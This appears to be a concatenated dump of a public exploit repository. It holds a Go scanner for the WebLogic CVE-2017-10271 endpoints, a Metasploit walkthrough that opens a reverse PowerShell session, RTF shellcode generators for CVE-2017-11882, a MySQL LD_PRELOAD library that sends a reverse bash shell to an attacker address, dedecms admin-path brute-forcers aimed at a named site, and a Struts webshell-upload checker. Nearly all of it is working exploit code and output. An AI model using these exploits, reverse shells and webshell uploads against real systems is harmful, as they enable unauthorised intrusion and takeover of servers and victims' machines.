TargetHost, id int, m *sync.Mutex) { 17 | tr := &http.Transport{ 18 | TLSClientConfig: &tls.Config{InsecureSkipVerify: true}, 19 | } 20 | 21 | client := &http.Client{ 22 | Timeout: 10 * time.Second, 23 | Transport: tr, 24 | } 25 | 26 | if !strings.HasPrefix(th.R, "http") { 27 | th.R = fmt.Sprintf("http://%s", th.R) 28 | } 29 | 30 | url := fmt.Sprintf("%s%s", th.R, th.U) 31 | req, err := http.NewRequest("POST", url, bytes.NewBuffer([]byte(th.P))) 32 | if err != nil { 33 | m.Lock() 34 | logrus.WithError(err).Errorln("Failed to create HTTP POST request") 35 | m.Unlock() 36 | return 37 | } 38 | 39 | req.Header.Add("Content-Type", "text/xml; charset=UTF-8") 40 | req.Header.Add("User-Agent", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36") 41 | 42 | m.Lock() 43 | logrus.Infof("Sending payload to %s in worker %d", url, id) 44 | m.Unlock() 45 | res, err := client.Do(req) 46 | if err != nil { 47 | m.Lock() 48 | logrus.WithError(err).Errorln("Error occurred while performing POST request") 49 | m.Unlock() 50 | return 51 | } 52 | 53 | m.Lock() 54 | logrus.WithFields(logrus.Fields{ 55 | "status_code": res.StatusCode, 56 | "status": res.Status, 57 | }).Infof("Payload sent to %s from worker %d", url, id) 58 | m.Unlock() 59 | } 60 | -------------------------------------------------------------------------------- /CVE-2017-10271/scanners/libcve201710271/target.go: -------------------------------------------------------------------------------- 1 | package libcve201710271 2 | 3 | // TargetHost is the information used to send a request 4 | type TargetHost struct { 5 | // R is the remote host 6 | R string 7 | // P is the payload 8 | P string 9 | // U is for the endpoint url 10 | U string 11 | } 12 | -------------------------------------------------------------------------------- /CVE-2017-10271/scanners/libcve201710271/urls.go: -------------------------------------------------------------------------------- 1 | package libcve201710271 2 | 3 | var ( 4 | // DefaultURLs is the endpoint URL that we should scan by default. 5 | DefaultURLs = []string{ 6 | "/wls-wsat/CoordinatorPortType", 7 | } 8 | 9 | // AllURLs is the endpoint URLs that are known to be vulnerable and may be 10 | // desirable to scan in certain cases. 11 | AllURLs = []string{ 12 | "/wls-wsat/CoordinatorPortType", 13 | "/wls-wsat/CoordinatorPortType11", 14 | "/wls-wsat/ParticipantPortType", 15 | "/wls-wsat/ParticipantPortType11", 16 | "/wls-wsat/RegistrationPortTypeRPC", 17 | "/wls-wsat/RegistrationPortTypeRPC11", 18 | "/wls-wsat/RegistrationRequesterPortType", 19 | "/wls-wsat/RegistrationRequesterPortType11", 20 | } 21 | ) 22 | -------------------------------------------------------------------------------- /CVE-2017-10271/scanners/libcve201710271/workers.go: -------------------------------------------------------------------------------- 1 | package libcve201710271 2 | 3 | import ( 4 | "sync" 5 | 6 | "github.com/sirupsen/logrus" 7 | ) 8 | 9 | // Worker is used to create a new worker which we'll use when sending requests 10 | func Worker(id int, m *sync.Mutex, jobs <-chan TargetHost) { 11 | m.Lock() 12 | logrus.Infof("Worker %d started", id) 13 | m.Unlock() 14 | for th := range jobs { 15 | SendRequest(th, id, m) 16 | } 17 | m.Lock() 18 | logrus.Infof("Worker %d finished", id) 19 | m.Unlock() 20 | } 21 | -------------------------------------------------------------------------------- /CVE-2017-10271/scanners/main.go: -------------------------------------------------------------------------------- 1 | // Copyright © 2018 Kevin Kirsche 2 | // 3 | // Licensed under the Apache License, Version 2.0 (the "License"); 4 | // you may not use this file except in compliance with the License. 5 | // You may obtain a copy of the License at 6 | // 7 | // http://www.apache.org/licenses/LICENSE-2.0 8 | // 9 | // Unless required by applicable law or agreed to in writing, software 10 | // distributed under the License is distributed on an "AS IS" BASIS, 11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | // See the License for the specific language governing permissions and 13 | // limitations under the License. 14 | 15 | package main 16 | 17 | import "github.com/kkirsche/CVE-2017-10271/scanners/cmd" 18 | 19 | func main() { 20 | cmd.Execute() 21 | } 22 | -------------------------------------------------------------------------------- /CVE-2017-10271/vulnerable_machine_setup.md: -------------------------------------------------------------------------------- 1 | # Vulnerable Application 2 | 3 | Oracle WebLogic server versions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0 with access to Web Services Atomic Transaction (WS-AT) endpoints are vulnerable to unauthenticated arbitrary command execution. 4 | 5 | ### Windows: Setting up a vulnerable application 6 | 7 | We successfully tested this exploit against a fully-patched, Windows 10 (x64) target. Since WebLogic is resource intensive, consider providing four cores and 8GB of RAM. 8 | 9 | 1. [Download](http://www.oracle.com/technetwork/middleware/weblogic/downloads/wls-main-097127.html) Oracle WebLogic Server 10.3.6, using the "Windows x86 with 32-bit JVM" (`wls1036_win32.exe`). 10 | 2. Run the installer. (See [here] for detailed instructions.) You may be prompted to install a Java Development Kit (JDK). [JDK 8u151 x64](http://www.oracle.com/technetwork/java/javase/downloads/jdk8-downloads-2133151.html) was verified working. 11 | 3. Windows Defender will block the payload from executing, so you may need to [temporarily](https://support.microsoft.com/en-us/help/4027187/windows-turn-off-windows-defender-antivirus) or [permanently](https://www.windowscentral.com/how-permanently-disable-windows-defender-windows-10) disable it. 12 | 4. Run the configuration wizard and [create a new weblogic domain](https://docs.oracle.com/cd/E29542_01/web.1111/e14140/newdom.htm#WLDCW192). Domain names and credentials are irrelevant. At the conclusion of the wizard, click "Start Admin Server". 13 | 5. The `startWebLogic.cmd` should run immediately after the installer and present logging output. Once running, the window should output a line similar to the following 14 | ``` 15 | 16 | 17 | ``` 18 | 19 | ### Windows: Attacking a vulnerable application 20 | 21 | Attack the above Windows server using the `exploit/multi/http/oracle_weblogic_wsat_deserialization_rce`: 22 | 23 | ``` 24 | msf > use exploit/multi/http/oracle_weblogic_wsat_deserialization_rce 25 | msf exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) > set RHOST [IP address of your target] 26 | msf exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) > set TARGET 0 27 | msf exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) > set PAYLOAD cmd/windows/reverse_powershell 28 | msf exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) > set LHOST [IP address of your attacker] 29 | msf exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) > run 30 | 31 | [*] Started reverse TCP handler on 192.168.108.1:4444 32 | [*] Command shell session 1 opened (192.168.108.1:4444 -> 192.168.108.132:50060) at 2018-01-11 11:48:16 -0600 33 | 34 | Microsoft Windows [Version 10.0.16299.192] 35 | (c) 2017 Microsoft Corporation. All rights reserved. 36 | 37 | C:\Oracle\Middleware\user_projects\domains\admindomain>whoami 38 | weblogic-server\Administrator 39 | ``` 40 | 41 | ### Unix: Setting up a vulnerable environment 42 | 43 | 1. If necessary, install Docker.io. [These instructions](https://www.ptrace-security.com/2017/06/14/how-to-install-docker-on-kali-linux-2017-1/) were tested on a Kali 2017.3 VM: 44 | 45 | ``` 46 | apt-key adv --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys 58118E89F3A912897C070ADBF76221572C52609D 47 | echo 'deb https://apt.dockerproject.org/repo debian-stretch main' > /etc/apt/sources.list.d/docker.list 48 | apt update 49 | apt-get install docker-engine 50 | service docker start 51 | docker run hello-world 52 | ``` 53 | 54 | 2. Install a container running Ubuntu 16.04 and WebLogic 10.3.6.0: 55 | ``` 56 | docker run -d -p7001:7001 -p80:7001 kkirsche/cve-2017-10271 57 | ``` 58 | 59 | 3. Confirm that the container is up. 60 | ``` 61 | docker ps 62 | ``` 63 | -------------------------------------------------------------------------------- /CVE-2017-11882/CVE-2017-11882.py: -------------------------------------------------------------------------------- 1 | # Original poc :https://github.com/embedi/CVE-2017-11882 2 | # This version accepts a command with 109 bytes long in maximum. 3 | # Sorry I don't know how to read the struct in objdata, hence I cannot modify the length parameter to aquire a arbitrary length code execution. 4 | # But that's enough in exploitation. We can use regsvr32 to load sct file remotely.:) 5 | 6 | import argparse 7 | from struct import pack 8 | 9 | head=r'''{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}} 10 | {\*\generator Riched20 6.3.9600}\viewkind4\uc1 11 | \pard\sa200\sl276\slmult1\f0\fs22\lang9{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata 01050000020000000b0000004571756174696f6e2e33000000000000000000000c0000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000000000000000000000010000000100000000000000001000000200000001000000feffffff0000000000000000fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff04000000fefffffffefffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500ffffffffffffffff0200000002ce020000000000c0000000000000460000000000000000000000008020cea5613cd30103000000000200000000000001004f006c00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a000201ffffffffffffffffffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000001400000000000000010043006f006d0070004f0062006a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000001000000660000000000000003004f0062006a0049006e0066006f0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000012000201ffffffff04000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000030000000600000000000000feffffff02000000fefffffffeffffff050000000600000007000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff010000020800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100feff030a0000ffffffff02ce020000000000c000000000000046170000004d6963726f736f6674204571756174696f6e20332e30000c0000004453204571756174696f6e000b0000004571756174696f6e2e3300f439b271000000000000000000000000000000000000000000000000000000000000000000000000000000000300040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 12 | ''' 13 | 14 | tail=r''' 15 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004500710075006100740069006F006E0020004E00610074006900760065000000000000000000000000000000000000000000000000000000000000000000000020000200FFFFFFFFFFFFFFFFFFFFFFFF00000000000000000000000000000000000000000000000000000000000000000000000004000000C5000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001050000050000000D0000004D45544146494C4550494354003421000035FEFFFF9201000008003421CB010000010009000003C500000002001C00000000000500000009020000000005000000020101000000050000000102FFFFFF00050000002E0118000000050000000B0200000000050000000C02A001201E1200000026060F001A00FFFFFFFF000010000000C0FFFFFFC6FFFFFFE01D0000660100000B00000026060F000C004D61746854797065000020001C000000FB0280FE0000000000009001000000000402001054696D6573204E657720526F6D616E00FEFFFFFF6B2C0A0700000A0000000000040000002D0100000C000000320A600190160A000000313131313131313131310C000000320A6001100F0A000000313131313131313131310C000000320A600190070A000000313131313131313131310C000000320A600110000A000000313131313131313131310A00000026060F000A00FFFFFFFF0100000000001C000000FB021000070000000000BC02000000000102022253797374656D000048008A0100000A000600000048008A01FFFFFFFF7CEF1800040000002D01010004000000F0010000030000000000 16 | }{\result{\pict{\*\picprop}\wmetafile8\picw380\pich260\picwgoal380\pichgoal260 17 | 0100090000039e00000002001c0000000000050000000902000000000500000002010100000005 18 | 0000000102ffffff00050000002e0118000000050000000b0200000000050000000c02a0016002 19 | 1200000026060f001a00ffffffff000010000000c0ffffffc6ffffff20020000660100000b0000 20 | 0026060f000c004d61746854797065000020001c000000fb0280fe000000000000900100000000 21 | 0402001054696d6573204e657720526f6d616e00feffffff5f2d0a6500000a0000000000040000 22 | 002d01000009000000320a6001100003000000313131000a00000026060f000a00ffffffff0100 23 | 000000001c000000fb021000070000000000bc02000000000102022253797374656d000048008a 24 | 0100000a000600000048008a01ffffffff6ce21800040000002d01010004000000f00100000300 25 | 00000000 26 | }}} 27 | \par} 28 | ''' 29 | #0: b8 44 eb 71 12 mov eax,0x1271eb44 30 | #5: ba 78 56 34 12 mov edx,0x12345678 31 | #a: 31 d0 xor eax,edx 32 | #c: 8b 08 mov ecx,DWORD PTR [eax] 33 | #e: 8b 09 mov ecx,DWORD PTR [ecx] 34 | #10: 8b 09 mov ecx,DWORD PTR [ecx] 35 | #12: 66 83 c1 3c add cx,0x3c 36 | #16: 31 db xor ebx,ebx 37 | #18: 53 push ebx 38 | #19: 51 push ecx 39 | #1a: be 64 3e 72 12 mov esi,0x12723e64 40 | #1f: 31 d6 xor esi,edx 41 | #21: ff 16 call DWORD PTR [esi] // call WinExec 42 | #23: 53 push ebx 43 | #24: 66 83 ee 4c sub si,0x4c 44 | #28: ff 10 call DWORD PTR [eax] // call ExitProcess 45 | stage1="\xB8\x44\xEB\x71\x12\xBA\x78\x56\x34\x12\x31\xD0\x8B\x08\x8B\x09\x8B\x09\x66\x83\xC1\x3C\x31\xDB\x53\x51\xBE\x64\x3E\x72\x12\x31\xD6\xFF\x16\x53\x66\x83\xEE\x4C\xFF\x10" 46 | 47 | 48 | # pads with nop 49 | stage1=stage1.ljust(44,'\x90') 50 | 51 | def genrtf(cmd): 52 | if len(cmd) > 109: 53 | raise ValueError("Command must be shorter than 109 bytes") 54 | payload='\x1c\x00\x00\x00\x02\x00\x9e\xc4\xa9\x00\x00\x00\x00\x00\x00\x00\xc8\xa7\\\x00\xc4\xee[\x00\x00\x00\x00\x00\x03\x01\x01\x03\n\n\x01\x08ZZ' 55 | payload+=stage1 56 | payload+=pack(' 51 | #include 52 | #include 53 | #include 54 | #include 55 | #include 56 | #include 57 | #include 58 | #include 59 | #include 60 | #include 61 | #include 62 | 63 | #define ATTACKERS_IP "127.0.0.1" 64 | #define SHELL_PORT 6033 65 | #define INJECTED_CONF "/var/lib/mysql/my.cnf" 66 | 67 | char* env_list[] = { "HOME=/root", NULL }; 68 | typedef ssize_t (*execvp_func_t)(const char *__file, char *const __argv[]); 69 | static execvp_func_t old_execvp = NULL; 70 | 71 | 72 | // fork & send a bash shell to the attacker before starting mysqld 73 | void reverse_shell(void) { 74 | 75 | int i; int sockfd; 76 | //socklen_t socklen; 77 | struct sockaddr_in srv_addr; 78 | srv_addr.sin_family = AF_INET; 79 | srv_addr.sin_port = htons( SHELL_PORT ); // connect-back port 80 | srv_addr.sin_addr.s_addr = inet_addr(ATTACKERS_IP); // connect-back ip 81 | 82 | // create new TCP socket && connect 83 | sockfd = socket( AF_INET, SOCK_STREAM, IPPROTO_IP ); 84 | connect(sockfd, (struct sockaddr *)&srv_addr, sizeof(srv_addr)); 85 | 86 | for(i = 0; i <= 2; i++) dup2(sockfd, i); 87 | execle( "/bin/bash", "/bin/bash", "-i", NULL, env_list ); 88 | 89 | exit(0); 90 | } 91 | 92 | 93 | /* 94 | cleanup injected data from the target config before it is read by mysqld 95 | in order to ensure clean startup of the service 96 | 97 | The injection (if done via logging) will start with a line like this: 98 | 99 | /usr/sbin/mysqld, Version: 5.5.50-0+deb8u1 ((Debian)). started with: 100 | 101 | */ 102 | 103 | int config_cleanup() { 104 | 105 | FILE *conf; 106 | char buffer[2000]; 107 | long cut_offset=0; 108 | 109 | conf = fopen(INJECTED_CONF, "r+"); 110 | if (!conf) return 1; 111 | 112 | while (!feof(conf)) { 113 | fgets(buffer, sizeof(buffer), conf); 114 | if (strstr(buffer,"/usr/sbin/mysqld, Version")) { 115 | cut_offset = (ftell(conf) - strlen(buffer)); 116 | } 117 | 118 | } 119 | if (cut_offset>0) ftruncate(fileno(conf), cut_offset); 120 | fclose(conf); 121 | return 0; 122 | 123 | } 124 | 125 | 126 | // execvp() hook 127 | int execvp(const char* filename, char* const argv[]) { 128 | 129 | pid_t pid; 130 | int fd; 131 | 132 | // Simple root PoC (touch /root/root_via_mysql) 133 | fd = open("/root/root_via_mysql", O_CREAT); 134 | close(fd); 135 | 136 | old_execvp = dlsym(RTLD_NEXT, "execvp"); 137 | 138 | // Fork a reverse shell and execute the original execvp() function 139 | pid = fork(); 140 | if (pid == 0) 141 | reverse_shell(); 142 | 143 | // clean injected payload before mysqld is started 144 | config_cleanup(); 145 | return old_execvp(filename, argv); 146 | } 147 | 148 | 149 | -------------------------------------------------------------------------------- /dedecms/found_admin_login_page.php: -------------------------------------------------------------------------------- 1 | true, 7 | CURLOPT_HEADER => true, 8 | CURLOPT_POST => true, 9 | CURLOPT_SSL_VERIFYHOST => false, 10 | CURLOPT_SSL_VERIFYHOST => false, 11 | CURLOPT_COOKIE => $cookie, 12 | CURLOPT_POSTFIELDS => $data, 13 | ); 14 | $ch = curl_init($url); 15 | curl_setopt_array($ch, $options); 16 | $result = curl_exec($ch); 17 | curl_close($ch); 18 | return $result; 19 | } 20 | $testlen=25; 21 | $str=range('a','z'); 22 | $number=range(0,9,1); 23 | $dic = array_merge($str, $number); 24 | $n=true; 25 | $nn=true; 26 | $path=''; 27 | while($n){ 28 | foreach($dic as $v){ 29 | foreach($dic as $vv){ 30 | #echo $v.$vv .'----'; 31 | $post_data="dopost=save&_FILES[b4dboy][tmp_name]=./$v$vv -------------------------------------------------------------------------------- /dedecms/found_admin_login_page.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | '''/* 3 | * author = Mochazz 4 | * team = 红日安全团队 5 | * env = pyton3 6 | * 7 | */ 8 | ''' 9 | import requests 10 | import itertools 11 | characters = "abcdefghijklmnopqrstuvwxyz0123456789_!#" 12 | back_dir = "" 13 | flag = 0 14 | url = "http://kaitin.cn/tags.php" 15 | data = { 16 | "_FILES[mochazz][tmp_name]" : "./{p}<""" 123 | test=url+payload 124 | request = urllib2.Request(test) 125 | response = urllib2.urlopen(request) 126 | get5=response.code 127 | if(get5==200 and get4==200 and get3==200 and get2==200 and get1==200): 128 | print " The webshell may have uploaded to /one1.jsp" 129 | print " Try to edit and use upload.html to upload your webshell\n" 130 | 131 | 132 | 133 | def message(self): 134 | print "You should use -u to test single website / or use -l to import a txt file to test more website" 135 | 136 | 137 | if __name__ == '__main__': 138 | struts=struts() 139 | try: 140 | opts,args=getopt.getopt(sys.argv[1:],"u:l:") 141 | except getopt.GetoptError: 142 | struts.message() 143 | sys.exit(2) 144 | if not len(opts): 145 | struts.message() 146 | sys.exit(2) 147 | for o, a in opts: 148 | if o in ("-u"): 149 | struts.sixteen(a) 150 | struts.nineteen(a) 151 | struts.twenty(a) 152 | if o in ("-l"): 153 | for line in open(a): 154 | struts.sixteen(line) 155 | struts.nineteen(line) 156 | struts.twenty(line) 157 | 158 | -------------------------------------------------------------------------------- /webdav_exec_CVE-2017-11882.py: -------------------------------------------------------------------------------- 1 | import argparse 2 | 3 | 4 | RTF_HEADER = R"""{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}} 5 | {\*\generator Riched20 6.3.9600}\viewkind4\uc1 6 | \pard\sa200\sl276\slmult1\f0\fs22\lang9""" 7 | 8 | 9 | RTF_TRAILER = R"""\par} 10 | """ 11 | 12 | 13 | OBJECT_HEADER = R"""{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata """ 14 | 15 | 16 | OBJECT_TRAILER = R""" 17 | }{\result{\pict{\*\picprop}\wmetafile8\picw380\pich260\picwgoal380\pichgoal260 18 | 0100090000039e00000002001c0000000000050000000902000000000500000002010100000005 19 | 0000000102ffffff00050000002e0118000000050000000b0200000000050000000c02a0016002 20 | 1200000026060f001a00ffffffff000010000000c0ffffffc6ffffff20020000660100000b0000 21 | 0026060f000c004d61746854797065000020001c000000fb0280fe000000000000900100000000 22 | 0402001054696d6573204e657720526f6d616e00feffffff5f2d0a6500000a0000000000040000 23 | 002d01000009000000320a6001100003000000313131000a00000026060f000a00ffffffff0100 24 | 000000001c000000fb021000070000000000bc02000000000102022253797374656d000048008a 25 | 0100000a000600000048008a01ffffffff6ce21800040000002d01010004000000f00100000300 26 | 00000000 27 | }}} 28 | """ 29 | 30 | 31 | OBJDATA_TEMPLATE = R""" 32 | 01050000020000000b0000004571756174696f6e2e33000000000000000000000c0000d0cf11e0a1 33 | b11ae1000000000000000000000000000000003e000300feff090006000000000000000000000001 34 | 0000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffff 35 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 36 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 37 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 38 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 39 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 40 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 41 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 42 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 43 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 44 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 45 | fffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff04000000fefffffffe 46 | fffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 47 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 48 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 49 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 50 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 51 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 52 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 53 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 54 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 55 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 56 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 57 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 58 | ffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e0074007200790000 59 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000 60 | 00000016000500ffffffffffffffff0200000002ce020000000000c0000000000000460000000000 61 | 000000000000008020cea5613cd30103000000000200000000000001004f006c0065000000000000 62 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000 63 | 00000000000000000000000a000201ffffffffffffffffffffffff00000000000000000000000000 64 | 0000000000000000000000000000000000000000000000000000001400000000000000010043006f 65 | 006d0070004f0062006a000000000000000000000000000000000000000000000000000000000000 66 | 00000000000000000000000000000000000000120002010100000003000000ffffffff0000000000 67 | 00000000000000000000000000000000000000000000000000000000000000010000006600000000 68 | 00000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000 69 | 00000000000000000000000000000000000000000000000000000012000201ffffffff04000000ff 70 | ffffff00000000000000000000000000000000000000000000000000000000000000000000000003 71 | 0000000600000000000000feffffff02000000fefffffffeffffff050000000600000007000000fe 72 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 73 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 74 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 75 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 76 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 77 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 78 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 79 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 80 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 81 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 82 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 83 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 84 | ffffff01000002080000000000000000000000000000000000000000000000000000000000000000 85 | 0000000000000000000000000000000000000000000000000000000100feff030a0000ffffffff02 86 | ce020000000000c000000000000046170000004d6963726f736f6674204571756174696f6e20332e 87 | 30000c0000004453204571756174696f6e000b0000004571756174696f6e2e3300f439b271000000 88 | 00000000000000000000000000000000000000000000000000000000000000000000000000030004 89 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000 90 | 000000000000000000000000000000000000001c00000002009ec4a900000000000000c8a75c00c4 91 | ee5b0000000000030101030a0a01085a5a4141414141414141414141414141414141414141414141 92 | 414141414141414141414141414141414141414141120c4300000000000000000000000000000000 93 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000 94 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000 95 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000 96 | 00000000000000000000000000000000000000000000000000000000000000000000004500710075 97 | 006100740069006f006e0020004e0061007400690076006500000000000000000000000000000000 98 | 0000000000000000000000000000000000000020000200ffffffffffffffffffffffff0000000000 99 | 0000000000000000000000000000000000000000000000000000000000000004000000c500000000 100 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000 101 | 00000000000000000000000000000000000000000000000000000000000000ffffffffffffffffff 102 | ffffff00000000000000000000000000000000000000000000000000000000000000000000000000 103 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000 104 | 000000000000000000000000000000000000000000000000000000000000000000000000000000ff 105 | ffffffffffffffffffffff0000000000000000000000000000000000000000000000000000000000 106 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000 107 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000 108 | 00000000000000ffffffffffffffffffffffff000000000000000000000000000000000000000000 109 | 00000000000000000000000000000000000000000000000000000001050000050000000d0000004d 110 | 45544146494c4550494354003421000035feffff9201000008003421cb010000010009000003c500 111 | 000002001c00000000000500000009020000000005000000020101000000050000000102ffffff00 112 | 050000002e0118000000050000000b0200000000050000000c02a001201e1200000026060f001a00 113 | ffffffff000010000000c0ffffffc6ffffffe01d0000660100000b00000026060f000c004d617468 114 | 54797065000020001c000000fb0280fe0000000000009001000000000402001054696d6573204e65 115 | 7720526f6d616e00feffffff6b2c0a0700000a0000000000040000002d0100000c000000320a6001 116 | 